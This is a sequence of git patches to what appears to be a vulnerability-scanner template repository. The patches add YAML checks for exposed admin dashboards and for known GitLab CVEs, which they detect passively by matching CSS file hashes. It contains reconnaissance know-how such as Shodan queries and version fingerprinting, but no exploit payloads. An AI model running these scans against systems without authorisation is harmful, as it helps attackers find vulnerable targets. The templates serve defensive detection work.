a/misconfiguration/ace-admin-dashboard.yaml +++ b/misconfiguration/ace-admin-dashboard.yaml @@ -1,13 +1,13 @@ id: ace-admin-dashboard info: - name: Ace Admin Dashboard Exposed + name: Ace Admin Dashboard Exposure author: tess severity: medium metadata: verified: true shodan-query: title:"Dashboard - Ace Admin" - tags: misconfig,exposed,ace + tags: misconfig,exposure,ace requests: - method: GET From 7a286ecec38c7c1e26ff321bf1e9673bb09ea440 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 10 Nov 2022 22:45:24 +0530 Subject: [PATCH 0105/1415] Update ace-admin-dashboard.yaml --- misconfiguration/ace-admin-dashboard.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/ace-admin-dashboard.yaml b/misconfiguration/ace-admin-dashboard.yaml index ad86201720..1e63d1d541 100644 --- a/misconfiguration/ace-admin-dashboard.yaml +++ b/misconfiguration/ace-admin-dashboard.yaml @@ -7,7 +7,7 @@ info: metadata: verified: true shodan-query: title:"Dashboard - Ace Admin" - tags: misconfig,exposure,ace + tags: misconfig,exposure,aceadmin requests: - method: GET From bc4b5d0d60d43a313816dc8b0530e0abbff68812 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 10 Nov 2022 17:17:00 +0000 Subject: [PATCH 0106/1415] Auto Generated New Template Addition List [Thu Nov 10 17:17:00 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 845720f512..8cf7fda62c 100644 --- a/.new-additions +++ b/.new-additions @@ -14,6 +14,7 @@ exposed-panels/deluge-webui-panel.yaml exposed-panels/mailhog-panel.yaml exposed-panels/payroll-management-system-panel.yaml exposed-panels/wiren-board-webui.yaml +misconfiguration/ace-admin-dashboard.yaml misconfiguration/confluence-dashboard.yaml misconfiguration/encompass-cm1-homepage.yaml misconfiguration/linktap-gateway-exposure.yaml From 28f1f8387aeb4f8841d829bc9b3ececb7de3d7c2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 10 Nov 2022 17:22:22 +0000 Subject: [PATCH 0107/1415] Auto Generated CVE annotations [Thu Nov 10 17:22:22 UTC 2022] :robot: --- cves/2022/CVE-2022-2373.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2022/CVE-2022-2373.yaml b/cves/2022/CVE-2022-2373.yaml index 0a18b266b0..7b32cc054a 100644 --- a/cves/2022/CVE-2022-2373.yaml +++ b/cves/2022/CVE-2022-2373.yaml @@ -10,6 +10,11 @@ info: - https://wpscan.com/vulnerability/6aa9aa0d-b447-4584-a07e-b8a0d1b83a31 - https://wordpress.org/plugins/simply-schedule-appointments/ - https://nvd.nist.gov/vuln/detail/CVE-2022-2373 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2022-2373 + cwe-id: CWE-862 metadata: verified: "true" tags: simply-schedule-appointments,unauth,wpscan,cve,cve2022,wordpress,wp-plugin,wp From 95e4e8f9f2c9eb3e9dd45eb139810f41ebf54ce2 Mon Sep 17 00:00:00 2001 From: "Greg Johnson (codeEmitter)" <124598+codeEmitter@users.noreply.github.com> Date: Mon, 12 Sep 2022 14:56:17 -0400 Subject: [PATCH 0108/1415] add CVE-2022-1162 - gitlab default password --- cves/2022/CVE-2022-1162.yaml | 43 ++++++++++++++++++++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 cves/2022/CVE-2022-1162.yaml diff --git a/cves/2022/CVE-2022-1162.yaml b/cves/2022/CVE-2022-1162.yaml new file mode 100644 index 0000000000..24bf7c8f64 --- /dev/null +++ b/cves/2022/CVE-2022-1162.yaml @@ -0,0 +1,43 @@ +id: CVE-2022-1162 + +info: + name: GitLab CE/EE - Hardcoded password + author: GitLab Red Team + severity: critical + description: A hardcoded password was set for accounts registered using an OmniAuth provider (e.g. OAuth, LDAP, SAML) in GitLab CE/EE versions 14.7 prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2 allowing attackers to potentially take over accounts. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below. + reference: + - https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/cve-hash-harvester + - https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-1162.json + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1162 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.1 + cve-id: CVE-2022-1162 + metadata: + shodan-query: http.title:"GitLab" + tags: kev,hackerone,cve,cve2022,gitlab,default password + +requests: + - method: GET + path: + - "{{BaseURL}}/users/sign_in" + + redirects: true + max-redirects: 3 + matchers: + - type: word + words: + - "003236d7e2c5f1f035dc8b67026d7583ee198b568932acd8faeac18cec673dfa" + - "1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98" + - "6eb5eaa5726150b8135a4fd09118cfd6b29f128586b7fa5019a04f1c740e9193" + - "6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef" + - "cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5" + - "f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac" + condition: or + + extractors: + - type: regex + group: 1 + regex: + - '(?:application-)(\S{64})(?:\.css)' + From 46522cdda743548a392be41796ffcf2c6316a92e Mon Sep 17 00:00:00 2001 From: "Greg Johnson (codeEmitter)" <124598+codeEmitter@users.noreply.github.com> Date: Mon, 12 Sep 2022 18:02:26 -0400 Subject: [PATCH 0109/1415] remove extra blank line --- cves/2022/CVE-2022-1162.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/cves/2022/CVE-2022-1162.yaml b/cves/2022/CVE-2022-1162.yaml index 24bf7c8f64..223c7aed5a 100644 --- a/cves/2022/CVE-2022-1162.yaml +++ b/cves/2022/CVE-2022-1162.yaml @@ -40,4 +40,3 @@ requests: group: 1 regex: - '(?:application-)(\S{64})(?:\.css)' - From eeec30ecab2d94eb781f0ddc206b8d4d7ad9c85b Mon Sep 17 00:00:00 2001 From: "Greg Johnson (codeEmitter)" <124598+codeEmitter@users.noreply.github.com> Date: Wed, 14 Sep 2022 12:27:45 -0400 Subject: [PATCH 0110/1415] add template for CVE-2022-2185 gitlab import rce --- cves/2022/CVE-2022-2185.yaml | 70 ++++++++++++++++++++++++++++++++++++ 1 file changed, 70 insertions(+) create mode 100644 cves/2022/CVE-2022-2185.yaml diff --git a/cves/2022/CVE-2022-2185.yaml b/cves/2022/CVE-2022-2185.yaml new file mode 100644 index 0000000000..9efd7f4cb6 --- /dev/null +++ b/cves/2022/CVE-2022-2185.yaml @@ -0,0 +1,70 @@ +id: CVE-2022-2185 + +info: + name: GitLab CE/EE - Import RCE + author: GitLab Red Team + severity: critical + description: A critical issue has been discovered in GitLab affecting all versions starting from 14.0 prior to 14.10.5, 15.0 prior to 15.0.4, and 15.1 prior to 15.1.1 where an authenticated user authorized to import projects could import a maliciously crafted project leading to remote code execution. + reference: + - https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/cve-hash-harvester + - https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-2185.json + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2185 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.9 + cve-id: CVE-2022-2185 + metadata: + shodan-query: http.title:"GitLab" + tags: kev,hackerone,cve,cve2022,gitlab,import rce + +requests: + - method: GET + path: + - "{{BaseURL}}/users/sign_in" + + redirects: true + max-redirects: 3 + matchers: + - type: word + words: + - "003236d7e2c5f1f035dc8b67026d7583ee198b568932acd8faeac18cec673dfa" + - "1062bbba2e9b04e360569154a8df8705a75d9e17de1a3a9acd5bd20f000fec8b" + - "1832611738f1e31dd00a8293bbf90fce9811b3eea5b21798a63890dbc51769c8" + - "1ae98447c220181b7bd2dfe88018cb6e1b1e4d12d7b8c224d651a48ed2d95dfe" + - "1d765038b21c5c76ff8492561c29984f3fa5c4b8cfb3a6c7b216ac8ab18b78c7" + - "1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98" + - "2ea7e9be931f24ebc2a67091b0f0ff95ba18e386f3d312545bb5caaac6c1a8be" + - "301b60d2c71a595adfb65b22edee9023961c5190e1807f6db7c597675b0a61f0" + - "383b8952f0627703ada7774dd42f3b901ea2e499fd556fce3ae0c6d604ad72b7" + - "4f233d907f30a050ca7e40fbd91742d444d28e50691c51b742714df8181bf4e7" + - "50d9206410f00bb00cc8f95865ab291c718e7a026e7fdc1fc9db0480586c4bc9" + - "515dc29796a763b500d37ec0c765957a136c9e1f1972bb52c3d7edcf4b6b8bbe" + - "57e83f1a3cf7c0fe3cf2357802306688dab60cf6a30d00e14e67826070db92de" + - "5cd37ee959b5338b5fb48eafc6c7290ca1fa60e653292304102cc19a16cc25e4" + - "5df2cb13ec314995ea43d698e888ddb240dbc7ccb6e635434dc8919eced3e25f" + - "6a58066d1bde4b6e661fbd5bde83d2dd90615ab409b8c8c36e04954fbd923424" + - "6eb5eaa5726150b8135a4fd09118cfd6b29f128586b7fa5019a04f1c740e9193" + - "6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef" + - "739a920f5840de93f944ec86c5a181d0205f1d9e679a4df1b9bf5b0882ab848a" + - "775f130d36e9eb14cb67c6a63551511b87f78944cebcf6cdddb78292030341df" + - "7d0792b17e1d2ccac7c6820dda1b54020b294006d7867b7d78a05060220a0213" + - "8b78708916f28aa9e54dacf9c9c08d720837ce78d8260c36c0f828612567d353" + - "90abf7746df5cb82bca9949de6f512de7cb10bec97d3f5103299a9ce38d5b159" + - "95ae8966ec1e6021f2553c7d275217fcfecd5a7f0b206151c5fb701beb7baf1e" + - "a4333a9de660b9fc4d227403f57d46ec275d6a6349a6f5bda0c9557001f87e5d" + - "a6d68fb0380bece011b0180b2926142630414c1d7a3e268fb461c51523b63778" + - "a743f974bacea01ccc609dcb79247598bd2896f64377ce4a9f9d0333ab7b274e" + - "a8bf3d1210afa873d9b9af583e944bdbf5ac7c8a63f6eccc3d6795802bd380d2" + - "ba74062de4171df6109c4c96da1ebe2b538bb6cc7cd55867cbdfba44777700e1" + - "c91127b2698c0a2ae0103be3accffe01995b8531bf1027ae4f0a8ad099e7a209" + - "cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5" + - "e539e07c389f60596c92b06467c735073788196fa51331255d66ff7afde5dfee" + - "f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac" + - "ff058b10a8dce9956247adba2e410a7f80010a236b2269fb53e0df5cd091e61d" + condition: or + + extractors: + - type: regex + group: 1 + regex: + - '(?:application-)(\S{64})(?:\.css)' From 41722c73c8a330c6e71d4e73558b03dd2655012a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 14 Sep 2022 19:35:00 +0000 Subject: [PATCH 0111/1415] Auto Generated CVE annotations [Wed Sep 14 19:35:00 UTC 2022] :robot: --- cves/2022/CVE-2022-1162.yaml | 5 +++-- cves/2022/CVE-2022-2185.yaml | 3 ++- 2 files changed, 5 insertions(+), 3 deletions(-) diff --git a/cves/2022/CVE-2022-1162.yaml b/cves/2022/CVE-2022-1162.yaml index 223c7aed5a..73f64e55a0 100644 --- a/cves/2022/CVE-2022-1162.yaml +++ b/cves/2022/CVE-2022-1162.yaml @@ -10,9 +10,10 @@ info: - https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-1162.json - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1162 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 9.1 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2022-1162 + cwe-id: CWE-798 metadata: shodan-query: http.title:"GitLab" tags: kev,hackerone,cve,cve2022,gitlab,default password diff --git a/cves/2022/CVE-2022-2185.yaml b/cves/2022/CVE-2022-2185.yaml index 9efd7f4cb6..f434b1f0d0 100644 --- a/cves/2022/CVE-2022-2185.yaml +++ b/cves/2022/CVE-2022-2185.yaml @@ -11,8 +11,9 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2185 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.9 + cvss-score: 9.8 cve-id: CVE-2022-2185 + cwe-id: CWE-732 metadata: shodan-query: http.title:"GitLab" tags: kev,hackerone,cve,cve2022,gitlab,import rce From a25722acb29227c7550a9970cccab9069e736930 Mon Sep 17 00:00:00 2001 From: "Greg Johnson (codeEmitter)" <124598+codeEmitter@users.noreply.github.com> Date: Fri, 16 Sep 2022 09:23:26 -0400 Subject: [PATCH 0112/1415] add template for CVE-2022-0735 --- cves/2022/CVE-2022-0735.yml | 99 +++++++++++++++++++++++++++++++++++++ 1 file changed, 99 insertions(+) create mode 100644 cves/2022/CVE-2022-0735.yml diff --git a/cves/2022/CVE-2022-0735.yml b/cves/2022/CVE-2022-0735.yml new file mode 100644 index 0000000000..813daeae0c --- /dev/null +++ b/cves/2022/CVE-2022-0735.yml @@ -0,0 +1,99 @@ +id: CVE-2022-0735 + +info: + name: GitLab CE/EE - Runner Registration Token Disclosure + author: GitLab Red Team + severity: critical + description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 12.10 before 14.6.5, all versions starting from 14.7 before 14.7.4, all versions starting from 14.8 before 14.8.2. An unauthorised user was able to steal runner registration tokens through an information disclosure vulnerability using quick actions commands. + reference: + - https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/cve-hash-harvester + - https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-0735.json + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0735 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2022-0735 + metadata: + shodan-query: http.title:"GitLab" + tags: kev,hackerone,cve,cve2022,gitlab,registration token disclosure + +requests: + - method: GET + path: + - "{{BaseURL}}/users/sign_in" + + redirects: true + max-redirects: 3 + matchers: + - type: word + words: + - "015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df" + - "02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b" + - "051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce" + - "08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290" + - "0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59" + - "1832611738f1e31dd00a8293bbf90fce9811b3eea5b21798a63890dbc51769c8" + - "1d765038b21c5c76ff8492561c29984f3fa5c4b8cfb3a6c7b216ac8ab18b78c7" + - "1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98" + - "27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959" + - "2cb8d6d6d17f1b1b8492581de92356755b864cbb6e48347a65baa2771a10ae4f" + - "2ea7e9be931f24ebc2a67091b0f0ff95ba18e386f3d312545bb5caaac6c1a8be" + - "301b60d2c71a595adfb65b22edee9023961c5190e1807f6db7c597675b0a61f0" + - "30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f" + - "383b8952f0627703ada7774dd42f3b901ea2e499fd556fce3ae0c6d604ad72b7" + - "4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1" + - "450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54" + - "455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8" + - "4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2" + - "4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160" + - "4f233d907f30a050ca7e40fbd91742d444d28e50691c51b742714df8181bf4e7" + - "50d9206410f00bb00cc8f95865ab291c718e7a026e7fdc1fc9db0480586c4bc9" + - "515dc29796a763b500d37ec0c765957a136c9e1f1972bb52c3d7edcf4b6b8bbe" + - "52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c" + - "57e83f1a3cf7c0fe3cf2357802306688dab60cf6a30d00e14e67826070db92de" + - "5cd37ee959b5338b5fb48eafc6c7290ca1fa60e653292304102cc19a16cc25e4" + - "5df2cb13ec314995ea43d698e888ddb240dbc7ccb6e635434dc8919eced3e25f" + - "62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51" + - "655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f" + - "6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb" + - "6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef" + - "775f130d36e9eb14cb67c6a63551511b87f78944cebcf6cdddb78292030341df" + - "79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9" + - "7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5" + - "81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3" + - "8b78708916f28aa9e54dacf9c9c08d720837ce78d8260c36c0f828612567d353" + - "90abf7746df5cb82bca9949de6f512de7cb10bec97d3f5103299a9ce38d5b159" + - "969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e" + - "a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528" + - "a4333a9de660b9fc4d227403f57d46ec275d6a6349a6f5bda0c9557001f87e5d" + - "a573aed3df818ca78ab40c01ae3514e16271a18e3c83122deab5d5623b25d4fe" + - "a624c11e908db556820e9b07de96e0a465e9be5d5e6b68cdafe6d5c95c99798b" + - "a8bf3d1210afa873d9b9af583e944bdbf5ac7c8a63f6eccc3d6795802bd380d2" + - "a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9" + - "ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5" + - "ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8" + - "b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711" + - "ba74062de4171df6109c4c96da1ebe2b538bb6cc7cd55867cbdfba44777700e1" + - "be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a" + - "bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4" + - "bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218" + - "c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4" + - "c91127b2698c0a2ae0103be3accffe01995b8531bf1027ae4f0a8ad099e7a209" + - "c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c" + - "cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5" + - "d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71" + - "d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb" + - "e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a" + - "e355f614211d036d0b3ffac4cd76da00d89e05717df61629e82571e20ac27488" + - "e539e07c389f60596c92b06467c735073788196fa51331255d66ff7afde5dfee" + - "ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d" + - "f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812" + - "f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac" + - "f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11" + condition: or + + extractors: + - type: regex + group: 1 + regex: + - '(?:application-)(\S{64})(?:\.css)' From 2d3f2dabcb3b837cc2e2b7aae4463653f853e4a1 Mon Sep 17 00:00:00 2001 From: "Greg Johnson (codeEmitter)" <124598+codeEmitter@users.noreply.github.com> Date: Fri, 16 Sep 2022 11:34:33 -0400 Subject: [PATCH 0113/1415] correct template naming --- cves/2022/{CVE-2022-0735.yml => CVE-2022-0735.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cves/2022/{CVE-2022-0735.yml => CVE-2022-0735.yaml} (100%) diff --git a/cves/2022/CVE-2022-0735.yml b/cves/2022/CVE-2022-0735.yaml similarity index 100% rename from cves/2022/CVE-2022-0735.yml rename to cves/2022/CVE-2022-0735.yaml From 860fa391f3219b58c297c1b64f13f01834c91e59 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Sep 2022 15:47:57 +0000 Subject: [PATCH 0114/1415] Auto Generated CVE annotations [Fri Sep 16 15:47:57 UTC 2022] :robot: --- cves/2022/CVE-2022-0735.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/cves/2022/CVE-2022-0735.yaml b/cves/2022/CVE-2022-0735.yaml index 813daeae0c..a8589b8781 100644 --- a/cves/2022/CVE-2022-0735.yaml +++ b/cves/2022/CVE-2022-0735.yaml @@ -10,9 +10,10 @@ info: - https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-0735.json - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0735 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2022-0735 + cwe-id: CWE-863 metadata: shodan-query: http.title:"GitLab" tags: kev,hackerone,cve,cve2022,gitlab,registration token disclosure From a6dfae28c663f1db6d8d947f013128ff7b069636 Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Thu, 10 Nov 2022 09:36:45 -0800 Subject: [PATCH 0115/1415] Update git-logs-exposure-detect.yaml --- exposures/logs/git-logs-exposure-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/logs/git-logs-exposure-detect.yaml b/exposures/logs/git-logs-exposure-detect.yaml index 22712c0cfa..a630065870 100644 --- a/exposures/logs/git-logs-exposure-detect.yaml +++ b/exposures/logs/git-logs-exposure-detect.yaml @@ -3,7 +3,7 @@ id: git-logs-exposure-detect info: name: Git logs Exposure author: tess - severity: high + severity: medium metadata: verified: true tags: logs,detect,git,exposed From 629a94b8a9ce439f681411f58de7ecada0f11c4a Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Thu, 10 Nov 2022 09:48:07 -0800 Subject: [PATCH 0116/1415] Create pa11y-dashboard.yaml --- misconfiguration/pa11y-dashboard.yaml | 33 +++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 misconfiguration/pa11y-dashboard.yaml diff --git a/misconfiguration/pa11y-dashboard.yaml b/misconfiguration/pa11y-dashboard.yaml new file mode 100644 index 0000000000..2e801c24ea --- /dev/null +++ b/misconfiguration/pa11y-dashboard.yaml @@ -0,0 +1,33 @@ +id: pa11y-dashboard + +info: + name: Pa11y Dashboard Exposed + author: tess + severity: low + metadata: + verified: true + shodan-query: title:"Pa11y Dashboard" + tags: misconfig,exposure,pa11y + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Pa11y Dashboard" + - "Add new URL" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From 955a06d29bdfb645bb06fd4a7afbfcafa7ebd6e0 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 10 Nov 2022 23:20:29 +0530 Subject: [PATCH 0117/1415] Update pa11y-dashboard.yaml --- misconfiguration/pa11y-dashboard.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/pa11y-dashboard.yaml b/misconfiguration/pa11y-dashboard.yaml index 2e801c24ea..ed8a537d09 100644 --- a/misconfiguration/pa11y-dashboard.yaml +++ b/misconfiguration/pa11y-dashboard.yaml @@ -1,7 +1,7 @@ id: pa11y-dashboard info: - name: Pa11y Dashboard Exposed + name: Pa11y Dashboard Exposure author: tess severity: low metadata: From b7a0940f81dbfea1866f7aa8742e94d1ff5ddf32 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 10 Nov 2022 17:53:01 +0000 Subject: [PATCH 0118/1415] Auto Generated New Template Addition List [Thu Nov 10 17:53:01 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 8cf7fda62c..c201e6a24f 100644 --- a/.new-additions +++ b/.new-additions @@ -19,6 +19,7 @@ misconfiguration/confluence-dashboard.yaml misconfiguration/encompass-cm1-homepage.yaml misconfiguration/linktap-gateway-exposure.yaml misconfiguration/ntop-panel-exposed.yaml +misconfiguration/pa11y-dashboard.yaml network/detection/ibm-d2b-database-server-detect.yaml network/detection/mikrotik-routeros-api-detect.yaml technologies/aem-cms.yaml From f2b57d923f3e4f60b3987bf5cb99908b3ca241e0 Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Thu, 10 Nov 2022 09:56:31 -0800 Subject: [PATCH 0119/1415] Create codis-dashboard.yaml --- misconfiguration/codis-dashboard.yaml | 33 +++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 misconfiguration/codis-dashboard.yaml diff --git a/misconfiguration/codis-dashboard.yaml b/misconfiguration/codis-dashboard.yaml new file mode 100644 index 0000000000..fadcc26e60 --- /dev/null +++ b/misconfiguration/codis-dashboard.yaml @@ -0,0 +1,33 @@ +id: codis-dashboard + +info: + name: Codis Dashboard Exposed + author: tess + severity: low + metadata: + verified: true + shodan-query: title:"Codis • Dashboard" + tags: misconfig,exposure,codis + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Codis" + - "Codis • Dashboard" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From 4142891cffd140ef34f2b0ade7deb60d2b30df15 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 10 Nov 2022 23:28:53 +0530 Subject: [PATCH 0120/1415] Update codis-dashboard.yaml --- misconfiguration/codis-dashboard.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/misconfiguration/codis-dashboard.yaml b/misconfiguration/codis-dashboard.yaml index fadcc26e60..6106ea7af0 100644 --- a/misconfiguration/codis-dashboard.yaml +++ b/misconfiguration/codis-dashboard.yaml @@ -1,7 +1,7 @@ id: codis-dashboard info: - name: Codis Dashboard Exposed + name: Codis Dashboard Exposure author: tess severity: low metadata: @@ -12,15 +12,15 @@ info: requests: - method: GET path: - - '{{BaseURL}}' + - "{{BaseURL}}" matchers-condition: and matchers: - type: word part: body words: - - "Codis" - "Codis • Dashboard" + - "Sessions" condition: and - type: word From 51f22fa331b123e13d9b6b8993b2aed2995deb19 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 10 Nov 2022 18:02:02 +0000 Subject: [PATCH 0121/1415] Auto Generated New Template Addition List [Thu Nov 10 18:02:02 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index c201e6a24f..21680711a9 100644 --- a/.new-additions +++ b/.new-additions @@ -15,6 +15,7 @@ exposed-panels/mailhog-panel.yaml exposed-panels/payroll-management-system-panel.yaml exposed-panels/wiren-board-webui.yaml misconfiguration/ace-admin-dashboard.yaml +misconfiguration/codis-dashboard.yaml misconfiguration/confluence-dashboard.yaml misconfiguration/encompass-cm1-homepage.yaml misconfiguration/linktap-gateway-exposure.yaml From 997b33050fa26ee17ba651754c9f76fd40557dd0 Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Thu, 10 Nov 2022 10:08:18 -0800 Subject: [PATCH 0122/1415] Create hydra-dashboard.yaml --- misconfiguration/hydra-dashboard.yaml | 33 +++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 misconfiguration/hydra-dashboard.yaml diff --git a/misconfiguration/hydra-dashboard.yaml b/misconfiguration/hydra-dashboard.yaml new file mode 100644 index 0000000000..1ea71a601f --- /dev/null +++ b/misconfiguration/hydra-dashboard.yaml @@ -0,0 +1,33 @@ +id: hydra-dashboard + +info: + name: Hydra Dashboard Exposed + author: tess + severity: low + metadata: + verified: true + shodan-query: title:"Hydra Router Dashboard" + tags: misconfig,exposure,hydra + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Hydra Router Dashboard" + - "screen: 'dashboard'" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From 